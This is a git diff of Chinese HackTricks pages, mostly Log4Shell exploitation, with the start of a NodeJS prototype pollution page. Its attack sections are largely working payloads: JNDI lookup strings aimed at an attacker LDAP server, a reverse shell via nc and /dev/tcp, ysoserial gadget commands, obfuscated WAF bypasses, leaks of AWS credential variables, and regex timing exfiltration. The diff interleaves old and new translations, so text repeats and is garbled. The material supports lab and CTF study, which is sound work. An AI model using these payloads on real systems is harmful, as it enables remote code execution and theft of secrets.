您可以尝试 **泄露** 的其他信息:
```
${env:AWS_ACCESS_KEY_ID}
${env:AWS_CONFIG_FILE}
@ -225,22 +227,22 @@ Any other env variable name that could store sensitive information
### RCE 信息
{% hint style="info" %}
运行在 JDK 版本高于 6u141、7u131 或 8u121 的主机上,针对 LDAP 类加载攻击向量进行了保护。这是因为默认情况下禁用了 `com.sun.jndi.ldap.object.trustURLCodebase`,阻止了 JNDI 通过 LDAP 加载远程代码库。然而,需要注意的是这些版本**仍然无法防御反序列化攻击向量**。
运行在 JDK 版本高于 6u141、7u131 或 8u121 的主机已针对 LDAP 类加载攻击向量进行了保护。这是由于默认禁用 `com.sun.jndi.ldap.object.trustURLCodebase`,这防止了 JNDI 通过 LDAP 加载远程代码库。然而,重要的是要注意,这些版本**并未保护免受反序列化攻击向量**。
对于试图利用这些较高 JDK 版本的攻击者,有必要利用 Java 应用程序中的**受信任小工具**。诸如 ysoserial 或 JNDIExploit 的工具经常用于此目的。相反,利用较低 JDK 版本相对更容易,因为这些版本可以被操纵以加载和执行任意类。
对于旨在利用这些较高 JDK 版本的攻击者,必须在 Java 应用程序中利用**受信任的工具**。像 ysoserial 或 JNDIExploit 这样的工具通常用于此目的。相反,利用较低的 JDK 版本相对容易,因为这些版本可以被操纵以加载和执行任意类。
要了解**更多信息**_如 RMI 和 CORBA 向量的限制_请查看前面的 JNDI 命名参考部分或[https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/](https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/)
有关**更多信息**_例如 RMI 和 CORBA 向量的限制_**请查看之前的 JNDI 命名参考部分**或 [https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/](https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/)
{% endhint %}
### RCE - 使用自定义有效载荷的 Marshalsec
### RCE - Marshalsec 与自定义有效负载
您可以在 **THM box** 中测试这个[**https://tryhackme.com/room/solar**](https://tryhackme.com/room/solar)
您可以在**THM box**中测试此内容[**https://tryhackme.com/room/solar**](https://tryhackme.com/room/solar)
使用工具 [**marshalsec**](https://github.com/mbechler/marshalsec)jar 版本可在[**这里**](https://github.com/RandomRobbieBF/marshalsec-jar)找到)。这种方法建立了一个 LDAP 引荐服务器,将连接重定向到一个次要的 HTTP 服务器,其中将托管利用程序
使用工具 [**marshalsec**](https://github.com/mbechler/marshalsec)jar 版本可在 [**这里**](https://github.com/RandomRobbieBF/marshalsec-jar) 获取)。此方法建立一个 LDAP 引用服务器,以将连接重定向到一个次级 HTTP 服务器,在该服务器上将托管漏洞
```bash
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your_ip_http_server>:8000/#Exploit"
```
求目标加载反向shell代码制作一个名为`Exploit.java`的Java文件,内容如下:
提示目标加载反向 shell 代码,制作一个名为 `Exploit.java` 的 Java 文件,内容如下:
```java
public class Exploit {
static {
@ -252,41 +254,41 @@ e.printStackTrace();
}
}
```
编译Java文件为一个类文件使用: `javac Exploit.java -source 8 -target 8`。接下来,在包含类文件的目录中启动一个**HTTP服务器**,使用: `python3 -m http.server`。确保**marshalsec LDAP服务器**引用了这个HTTP服务器。
将Java文件编译成类文件使用`javac Exploit.java -source 8 -target 8`。接下来,在包含类文件的目录中启动一个**HTTP服务器**,使用:`python3 -m http.server`。确保**marshalsec LDAP服务器**引用此HTTP服务器。
通过发送一个类似以下内容的有效负载触发在易受攻击的Web服务器上执行Exploit类的操作
通过发送类似的有效负载来触发易受攻击的Web服务器上利用类的执行
```bash
${jndi:ldap://<LDAP_IP>:1389/Exploit}
```
**注意:** 此漏洞依赖于Java的配置允许通过LDAP加载远程代码库。如果不允许此操作请考虑利用受信任的类执行任意代码
**注意:** 此漏洞依赖于Java的配置以允许通过LDAP加载远程代码库。如果这不被允许请考虑利用受信任的类进行任意代码执行
### RCE - **JNDIExploit**
{% hint style="info" %}
请注意,由于发现了log4shell作者出于某种原因从github中删除了此项目。您可以在[https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2](https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2)中找到缓存版本,但如果您希望尊重作者的决定,请使用其他方法来利用此漏洞。
请注意,出于某种原因作者在发现log4shell后将此项目从github中删除。您可以在[https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2](https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2)找到缓存版本,但如果您想尊重作者的决定,请使用其他方法来利用此漏洞。
此外,您无法在wayback machine中找到源代码因此要么分析源代码要么执行jar文件知道您不知道自己在执行什么。
此外,您无法在时光机中找到源代码因此要么分析源代码要么执行jar文件前提是您不知道自己在执行什么。
{% endhint %}
例如您可以在端口8080上运行此**易受log4shell影响的脆弱Web服务器**[https://github.com/christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app)_在自述文件中您将找到如何运行它的说明_。此易受攻击的应用程序正在使用易受攻击版本的log4shell记录HTTP请求标头_X-Api-Version_的内容。
在此示例中您可以在8080端口运行此**易受攻击的web服务器以进行log4shell**[https://github.com/christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app)_在README中您将找到如何运行它_。此易受攻击的应用程序使用易受攻击的log4shell版本记录HTTP请求头_X-Api-Version_的内容。
然后,您可以下载**JNDIExploit** jar文件并执行以下操作
然后,您可以下载**JNDIExploit** jar文件并使用以下命令执行它
```bash
wget https://web.archive.org/web/20211210224333/https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
unzip JNDIExploit.v1.2.zip
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.17.0.1 -p 8888 # Use your private IP address and a port where the victim will be able to access
```
在阅读代码仅几分钟后,在_com.feihong.ldap.LdapServer_和_com.feihong.ldap.HTTPServer_中您可以看到**LDAP和HTTP服务器是如何创建**的。LDAP服务器将了解需要提供的有效负载并将受害者重定向到HTTP服务器后者将提供利用。\
_com.feihong.ldap.gadgets_中您可以找到**一些特定的小工具**可用于执行所需的操作可能执行任意代码。在_com.feihong.ldap.template_中您可以看到将**生成利用**的不同模板类
在阅读代码仅几分钟后,在 _com.feihong.ldap.LdapServer__com.feihong.ldap.HTTPServer_ 中,您可以看到 **LDAP 和 HTTP 服务器是如何创建的**。LDAP 服务器将理解需要提供的有效负载,并将受害者重定向到 HTTP 服务器,后者将提供漏洞利用。\
_com.feihong.ldap.gadgets_ 中,您可以找到 **一些特定的工具**,可以用来执行所需的操作(可能执行任意代码)。在 _com.feihong.ldap.template_ 中,您可以看到不同的模板类,这些类将 **生成漏洞利用**
您可以使用**`java -jar JNDIExploit-1.2-SNAPSHOT.jar -u`**查看所有可用的利用。一些有用的利用包括:
您可以使用 **`java -jar JNDIExploit-1.2-SNAPSHOT.jar -u`** 查看所有可用的漏洞利用。一些有用的包括:
```bash
ldap://null:1389/Basic/Dnslog/[domain]
ldap://null:1389/Basic/Command/Base64/[base64_encoded_cmd]
ldap://null:1389/Basic/ReverseShell/[ip]/[port]
# But there are a lot more
```
因此,在我们的示例中,我们已经运行了那个存在漏洞的 Docker 应用程序。要对其发动攻击
所以,在我们的例子中,我们已经有了那个易受攻击的 Docker 应用程序在运行。要攻击它
```bash
# Create a file inside of th vulnerable host:
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
@ -295,10 +297,14 @@ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Comma
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/ReverseShell/172.17.0.1/4444}'
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/bmMgMTcyLjE3LjAuMSA0NDQ0IC1lIC9iaW4vc2gK}'
```
当发送攻击时,您将在执行 **JNDIExploit-1.2-SNAPSHOT.jar** 的终端中看到一些输出。
**请记得检查 `java -jar JNDIExploit-1.2-SNAPSHOT.jar -u` 以获取其他利用选项。此外,如果需要,您可以更改 LDAP 和 HTTP 服务器的端口。**
### RCE - JNDI-Exploit-Kit <a href="#rce__jndiexploitkit_33" id="rce__jndiexploitkit_33"></a>
与先前的利用方式类似,您可以尝试使用[JNDI-Exploit-Kit](https://github.com/pimps/JNDI-Exploit-Kit)来利用这个漏洞。\
您可以生成要发送给受害者的URL方法如下
之前的利用方式类似,您可以尝试使用 [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) 来利用此漏洞。\
您可以生成要发送给受害者的 URL运行
```bash
# Get reverse shell in port 4444 (only unix)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 172.17.0.1:1389 -J 172.17.0.1:8888 -S 172.17.0.1:4444
@ -306,30 +312,30 @@ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 172.17.0.1:1389 -J 172.
# Execute command
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 172.17.0.1:1389 -J 172.17.0.1:8888 -C "touch /tmp/log4shell"
```
_这种利用自定义生成的Java对象的攻击在类似**THM太阳房间**的实验室中可以生效。然而,通常情况下不会生因为默认情况下Java未配置为使用LDAP加载远程代码库我认为这是因为它没有滥用受信任的类来执行任意代码。_
_这个攻击使用自定义生成的java对象将在像**THM solar room**这样的实验室中有效。然而,这通常不会有因为默认情况下Java未配置为使用LDAP加载远程代码库我认为这是因为它没有滥用受信任的类来执行任意代码。_
### RCE - JNDI注入利用增强版
### RCE - JNDI-Injection-Exploit-Plus
[https://github.com/cckuailong/JNDI-Injection-Exploit-Plus](https://github.com/cckuailong/JNDI-Injection-Exploit-Plus) 是另一个用于生成**可用JNDI链接**并通过启动RMI服务器、LDAP服务器和HTTP服务器提供后台服务的工具\
[https://github.com/cckuailong/JNDI-Injection-Exploit-Plus](https://github.com/cckuailong/JNDI-Injection-Exploit-Plus) 是另一个生成**可用JNDI链接**的工具,并通过启动RMI服务器、LDAP服务器和HTTP服务器提供后台服务。
### RCE - ysoserial 和 JNDI利用工具包
### RCE - ysoserial & JNDI-Exploit-Kit
这个选项对于攻击**仅信任指定类而不是所有人的Java版本**非常有用。因此,**ysoserial** 将被用来生成**受信任类的序列化**,这些序列化可以用作小工具来**执行任意代码**_ysoserial滥用的受信任类必须被受害者Java程序使用以使利用生效_
这个选项对于攻击**仅信任指定类而不是所有类的Java版本**非常有用。因此,**ysoserial**将用于生成**受信任类的序列化**,这些序列化可以用作**执行任意代码**的工具_ysoserial滥用的受信任类必须被受害者的java程序使用以便利用能够生效_
使用**ysoserial** 或 [**ysoserial-modified**](https://github.com/pimps/ysoserial-modified) 您可以创建反序列化利用该利用将被JNDI下载
使用**ysoserial**或[**ysoserial-modified**](https://github.com/pimps/ysoserial-modified)您可以创建将被JNDI下载的反序列化利用
```bash
# Rev shell via CommonsCollections5
java -jar ysoserial-modified.jar CommonsCollections5 bash 'bash -i >& /dev/tcp/10.10.14.10/7878 0>&1' > /tmp/cc5.ser
```
使用[JNDI-Exploit-Kit](https://github.com/pimps/JNDI-Exploit-Kit)生成**JNDI链接**,在那里漏洞将等待来自受影响机器的连接。您可以提供**不同的漏洞利用**这些漏洞利用可以由JNDI-Exploit-Kit自动生成也可以使用您自己的反序列化有效负载由您或ysoserial生成)。
使用 [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) 生成 **JNDI 链接**,其中漏洞将等待来自易受攻击机器的连接。您可以提供 **不同的利用程序,这些利用程序可以由 JNDI-Exploit-Kit 自动生成**,甚至是您 **自己的反序列化有效负载**(由您或 ysoserial 生成)。
```bash
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.10:1389 -P /tmp/cc5.ser
```
![](<../../.gitbook/assets/image (1118).png>)
现在您可以轻松使用生成的JNDI链接来利用漏洞并获取**反向 shell**,只需发送到一个有漏洞的 log4j 版本:**`${ldap://10.10.14.10:1389/generated}`**
现在您可以轻松使用生成的 JNDI 链接来利用该漏洞并获得一个 **反向 shell**,只需发送到一个易受攻击的 log4j 版本:**`${ldap://10.10.14.10:1389/generated}`**
### 绕过方
### 绕过方
```java
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
@ -352,76 +358,70 @@ ${${lower:jnd}${lower:${upper:ı}}:ldap://...} //Notice the unicode "i"
* [https://github.com/logpresso/CVE-2021-44228-Scanner](https://github.com/logpresso/CVE-2021-44228-Scanner)
* [https://github.com/palantir/log4j-sniffer](https://github.com/palantir/log4j-sniffer) - 查找本地易受攻击的库
### 用于测试实验室
### 测试实验室
* [**LogForge HTB 机器**](https://app.hackthebox.com/tracks/UHC-track)
* [**Try Hack Me Solar room**](https://tryhackme.com/room/solar)
* [**Try Hack Me Solar 房间**](https://tryhackme.com/room/solar)
* [**https://github.com/leonjza/log4jpwn**](https://github.com/leonjza/log4jpwn)
* [**https://github.com/christophetd/log4shell-vulnerable-app**](https://github.com/christophetd/log4shell-vulnerable-app)
## Log4Shell 漏洞利用
## Post-Log4Shell 利用
在这个[**CTF writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/)中很好地解释了如何**滥用**Log4J的一些功能。
在这个 [**CTF 文章**](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/) 中很好地解释了如何 **可能** **滥用** **Log4J** 的某些功能。
Log4j的[**安全页面**](https://logging.apache.org/log4j/2.x/security.html)中有一些有趣的句子:
Log4j [**安全页面**](https://logging.apache.org/log4j/2.x/security.html) 有一些有趣的句子:
> 从版本2.16.0适用于Java 8开始**消息查找功能已完全移除**。**配置中的查找仍然有效**。此外Log4j现在默认禁用对JNDI的访问。现在需要显式启用配置中的JNDI查找。
> 从版本 2.16.0(对于 Java 8开始**消息查找功能已被完全移除**。**配置中的查找仍然有效**。此外Log4j 现在默认禁用对 JNDI 的访问。配置中的 JNDI 查找现在需要显式启用
> 从版本2.17.0开始对于Java 7和Java 6分别为2.12.3和2.3.1**仅在配置中扩展查找字符串**;在任何其他用途中,仅解析顶级查找,并且不解析任何嵌套查找
> 从版本 2.17.0(以及 Java 7 和 Java 6 的 2.12.3 和 2.3.1)开始,**只有配置中的查找字符串会递归展开**;在任何其他用法中,仅解析顶级查找,任何嵌套查找都不会被解析
这意味着默认情况下您可以**忘记使用任何`jndi`漏洞**。此外,要执行**递归查找**,您需要配置它们
这意味着默认情况下你可以 **忘记使用任何 `jndi` 漏洞**。此外,要执行 **递归查找**,你需要进行配置
例如,在该CTF中这在文件log4j2.xml中配置如下
例如,在那个 CTF 中,这在文件 log4j2.xml 中进行了配置
```xml
<Console name="Console" target="SYSTEM_ERR">
<PatternLayout pattern="%d{HH:mm:ss.SSS} %-5level %logger{36} executing ${sys:cmd} - %msg %n">
</PatternLayout>
</Console>
```
### 环境查找
### Env Lookups
在[这个CTF](https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/)中,攻击者控制了`${sys:cmd}`的值,并需要从环境变量中窃取标志。\
如在[**先前的有效载荷**](jndi-java-naming-and-directory-interface-and-log4shell.md#verification)页面中所见,有不同的访问环境变量的方式,比如:**`${env:FLAG}`**。在这个CTF中这是无用的,但在其他现实场景中可能会有用。
[这个 CTF](https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/) 中,攻击者控制了 `${sys:cmd}` 的值,并需要从环境变量中提取标志。\
如在 [**之前的有效载荷**](jndi-java-naming-and-directory-interface-and-log4shell.md#verification) 页面中所见,有几种访问环境变量的方法,例如:**`${env:FLAG}`**。在这个 CTF 中这没有用,但在其他现实场景中可能会有用。
### 异常中的数据窃取
### Exfiltration in Exceptions
CTF中你**无法访问**使用log4J的java应用程序的stderr但Log4J**异常会发送到stdout**这在python应用程序中被打印出来。这意味着触发异常后我们可以访问内容。一个用于窃取标志的异常是**`${java:${env:FLAG}}`**。这能够工作是因为**`${java:CTF{blahblah}}`**不存在,异常将显示标志的值
CTF 中,你 **无法访问** 使用 log4J 的 Java 应用程序的 stderr但 Log4J **异常会发送到 stdout**,这在 Python 应用程序中被打印。这意味着触发异常时我们可以访问内容。提取标志的异常是:**`${java:${env:FLAG}}`**。这有效是因为 **`${java:CTF{blahblah}}`** 不存在,异常的值将显示标志
![](<../../.gitbook/assets/image (1023).png>)
### 转换模式异常
### Conversion Patterns Exceptions
在CTF中你**无法访问**使用log4J的java应用程序的stderr但Log4J**异常会发送到stdout**这在python应用程序中被打印出来。这意味着触发异常后我们可以访问内容。一个用于窃取标志的异常是**`${java:${env:FLAG}}`**。这能够工作是因为**`${java:CTF{blahblah}}`**不存在,异常将显示标志的值:
![](<../../.gitbook/assets/image (1023).png>)
### 转换模式异常
只是提一下,你也可以注入新的[**转换模式**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout)并触发将被记录到`stdout`的异常。例如:
仅提及,你还可以注入新的 [**转换模式**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout) 并触发将被记录到 `stdout` 的异常。例如:
![](<../../.gitbook/assets/image (683).png>)
这并没有被发现有用于在错误消息中窃取日期,因为查找在转换模式之前没有解决,但它可能对其他事情有用,如检测。
这在提取错误消息中的数据时并没有被发现有用,因为查找在转换模式之前没有解决,但它可能对其他事情有用,例如检测。
### 转换模式正则表达式
### Conversion Patterns Regexes
然而,可以使用一些支持正则表达式的**转换模式**来通过使用正则表达式和滥用**二分查找**或**基于时间**的行为来从查找中窃取信息。
然而,可以使用一些 **支持正则表达式的转换模式** 通过使用正则表达式和滥用 **二分查找****基于时间** 的行为来提取信息。
- **通过异常消息进行二分查找**
* **通过异常消息进行二分查找**
转换模式**`%replace`**可以用于**替换**字符串中的**内容**,甚至使用**正则表达式**。它的工作方式如下`replace{pattern}{regex}{substitution}`\
滥用这种行为,你可以使替换**如果正则表达式匹配**字符串中的任何内容则触发异常(如果未找到则不会有异常),就像这样
转换模式 **`%replace`** 可以用来 **替换** **字符串** 中的 **内容**,甚至使用 **正则表达式**。它的工作方式是`replace{pattern}{regex}{substitution}`\
滥用这种行为,你可以使替换 **在正则表达式匹配字符串中的任何内容时触发异常**(如果未找到则不触发异常),如下所示
```bash
%replace{${env:FLAG}}{^CTF.*}{${error}}
# The string searched is the env FLAG, the regex searched is ^CTF.*
## and ONLY if it's found ${error} will be resolved with will trigger an exception
```
* **基于时间的攻击**
* **基于时间的**
正如前一节中提到的,**`%replace`** 支持 **正则表达式**。因此,可以使用来自[**ReDoS页面**](../regular-expression-denial-of-service-redos.md)的有效载荷来引发超时,以便在找到标志时触发超时。\
例如,像 `%replace{${env:FLAG}}{^(?=CTF)((.`_`)`_`)*salt$}{asd}` 这样的有效载荷将在那个CTF比赛中触发超时
正如前一节提到的,**`%replace`** 支持 **regexes**。因此,可以使用来自 [**ReDoS 页面**](../regular-expression-denial-of-service-redos.md) 的有效载荷来导致 **超时**,如果找到标志。\
例如,像 `%replace{${env:FLAG}}{^(?=CTF)((.`_`)`_`)*salt$}{asd}` 的有效载荷将在该 CTF 中触发 **超时**
在这个[**writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/)中,它没有使用 ReDoS 攻击,而是使用了**放大攻击**来导致响应中的时间差异
在这个 [**写作**](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/) 中,使用了 **放大攻击** 而不是 ReDoS 攻击来造成响应中的时间差
> ```
> /%replace{
@ -440,11 +440,11 @@ Log4j的[**安全页面**](https://logging.apache.org/log4j/2.x/security.html)
> }{#}{######################################################}
> ```
>
> 如果标志以 `flagGuess` 开头,整个标志将被替换为 29 个 `#`(我使用这个字符是因为它可能不是标志的一部分)。**然后,每个生成的 29 个 `#` 将被替换为 54 个 `#`**。这个过程重复进行 **6 次**,总共产生了 ` 29*54*54^6* =`` `` `**`96816014208`** **个 `#`**
> 如果标志以 `flagGuess` 开头,则整个标志将被 29 个 `#` 替换(我使用这个字符是因为它可能不会是标志的一部分)。**然后将结果中的每个 29 个 `#` 替换为 54 个 `#`**。这个过程重复 **6 次**,导致总共 ` 29*54*54^6* =`` `` `**`96816014208`** **`#`**
>
> 替换这么多 `#` 将触发 Flask 应用程序的 10 秒超时,进而导致向用户发送 HTTP 状态码 500。(如果标志不以 `flagGuess` 开头,我们将收到非 500 状态码)
> 替换如此多的 `#` 将触发 Flask 应用程序的 10 秒超时,这将导致 HTTP 状态代码 500 被发送给用户。(如果标志不以 `flagGuess` 开头,我们将收到非 500 状态码)
## 参考资料
## 参考文献
* [https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/](https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/)
* [https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/](https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/)
@ -455,22 +455,23 @@ Log4j的[**安全页面**](https://logging.apache.org/log4j/2.x/security.html)
* [https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/)
* [https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/](https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/)
**Try Hard Security Group**
**努力安全小组**
<figure><img src="../../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,29 +1,32 @@
# NodeJS - \_\_proto\_\_ & prototype Pollution
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## JavaScript中的对象 <a href="#id-053a" id="id-053a"></a>
## JavaScript 中的对象 <a href="#id-053a" id="id-053a"></a>
JavaScript中的对象本质上是键值对的集合称为属性。可以使用`Object.create`方法并将`null`作为参数来创建一个空对象。这种方法允许创建一个没有任何继承属性的对象。
JavaScript 中的对象本质上是键值对的集合,称为属性。可以使用 `Object.create` 并将 `null` 作为参数来创建一个空对象。此方法允许创建没有任何继承属性的对象。
```javascript
// Run this in the developers tools console
console.log(Object.create(null)); // This will output an empty object.
```
一个空对象类似于一个空字典,表示为`{}`。
### JavaScript中的函数和类
在JavaScript中类和函数密切相关函数经常充当类的构造函数。尽管JavaScript缺乏原生类支持但构造函数可以模拟类的行为。
在JavaScript中类和函数密切相关函数通常作为类的构造函数。尽管JavaScript缺乏原生类支持但构造函数可以模拟类的行为。
```javascript
// Run this in the developers tools console
@ -41,37 +44,37 @@ var employee1 = new Employee("Generic Employee", "Developer");
employee1.__proto__
```
### JavaScript中的原型
### Prototypes in JavaScript
JavaScript允许在运行时修改、添加或删除原型属性。这种灵活性使得可以动态扩展类的功能。
JavaScript 允许在运行时修改、添加或删除原型属性。这种灵活性使得类功能的动态扩展成为可能。
`toString`和`valueOf`等函数可以被修改以改变它们的行为展示了JavaScript原型系统的适应性。
`toString``valueOf` 这样的函数可以被改变以改变它们的行为,展示了 JavaScript 原型系统的适应性。
## 继承
## Inheritance
在基于原型的编程中,属性/方法是从类中的对象继承的。这些类是通过将属性/方法添加到另一个类的实例或空对象中创建的。
在基于原型的编程中,属性/方法由对象从类中继承。这些类是通过将属性/方法添加到另一个类的实例或一个空对象来创建的。
值得注意的是,当将属性添加到充当其他对象原型的对象(如`myPersonObj`)时,继承对象就可以访问这个新属性。然而,除非显式调用,否则这个属性不会自动显示。
需要注意的是,当一个属性被添加到作为其他对象原型的对象(例如 `myPersonObj`)时,继承的对象可以访问这个新属性。然而,除非明确调用,否则这个属性不会自动显示。
## \_\_proto\_\_污染 <a href="#id-0d0a" id="id-0d0a"></a>
## \_\_proto\_\_ pollution <a href="#id-0d0a" id="id-0d0a"></a>
## 探索JavaScript中的原型污染
## Exploring Prototype Pollution in JavaScript
JavaScript对象由键值对定义并从JavaScript对象原型继承。这意味着修改Object原型可能会影响环境中的所有对象。
JavaScript 对象由键值对定义,并从 JavaScript 对象原型继承。这意味着改变对象原型可以影响环境中的所有对象。
让我们使用一个不同的例来说明:
让我们用一个不同的例来说明:
```javascript
function Vehicle(model) {
this.model = model;
}
var car1 = new Vehicle("Tesla Model S");
```
可以通过以下方式访问对象原型:
通过以下方式可以访问 Object 原型:
```javascript
car1.__proto__.__proto__;
Vehicle.__proto__.__proto__;
```
通过向Object原型添加属性每个JavaScript对象将继承这些新属性:
通过向 Object 原型添加属性,每个 JavaScript 对象将继承这些新属性:
```javascript
function Vehicle(model) {
this.model = model;
@ -84,9 +87,9 @@ car1.announce(); // Outputs "Beep beep!"
car1.__proto__.__proto__.isVehicle = true;
console.log(car1.isVehicle); // Outputs true
```
## 原型污染
## prototype pollution
对于限制`__proto__` 使用的情况,修改函数的原型是一种替代方法
对于限制使用 `__proto__` 的场景,修改函数的原型是一个替代方案
```javascript
function Vehicle(model) {
this.model = model;
@ -102,11 +105,11 @@ console.log(car1.hasWheels); // Outputs true
car1.constructor.prototype.honk = function() { console.log("Honk!"); };
car1.constructor.prototype.isElectric = true;
```
这仅影响从`Vehicle`构造函数创建的对象,为它们提供`beep`、`hasWheels`、`honk`和`isElectric`属性。
这仅影响从 `Vehicle` 构造函数创建的对象,使它们具有 `beep`、`hasWheels`、`honk` 和 `isElectric` 属性。
全局影响JavaScript对象的两种方法包括
